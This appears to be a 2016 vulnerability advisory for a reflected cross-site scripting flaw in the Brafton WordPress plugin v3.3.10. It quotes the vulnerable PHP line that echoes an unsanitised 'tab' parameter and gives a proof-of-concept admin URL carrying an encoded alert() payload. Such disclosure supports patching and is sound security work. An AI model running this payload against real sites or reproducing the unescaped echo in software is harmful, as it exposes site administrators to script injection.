WordPress Brafton 3.3.10 Cross Site Scripting

`# Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin  
# Date: Fri May 20 2016  
# Reported Date : Fri May 20 2016  
# Vendor Homepage: http://www.brafton.com/support/wordpress/  
# Version: v3.3.10 – January2016  
# Software Link:  
https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip  
# Exploit Author :MehrdadLinux  
# Tested On : Linux Platforms.  
# Fix/Patching : Update To  
# Facebook : https://facebook.com/MehrdadLinux  
# Twitter : http://twitter.com/MehrdadLinux  
# Detailed Vul: http://blog.opsnit.com  
===========================================================================================  
  
1. VULNERABILITY  
-------------------------  
  
brafton WordPress Plugin v3.3.10 – January2016  
  
  
2. BACKGROUND  
-------------------------  
this is WordPress Plugin for Brafton  
  
Brafton is a content marketing agency.  
Our in-house teams develop and execute SEO-optimized content strategies,  
from news to infographics  
  
  
3. DESCRIPTION  
-------------------------  
XSS in BraftonAdminPage.php  
  
in line 11 :  
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo  
0;}?>;  
  
wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))  
  
  
4. discovered by :  
-------------------------  
  
The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and  
Hossein Masoudi (cs.masoudi)  
email : MehrdadLinux (at) gmail (dot) com  
http://opsnit.com  
  
  
5 .LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this  
information.  
`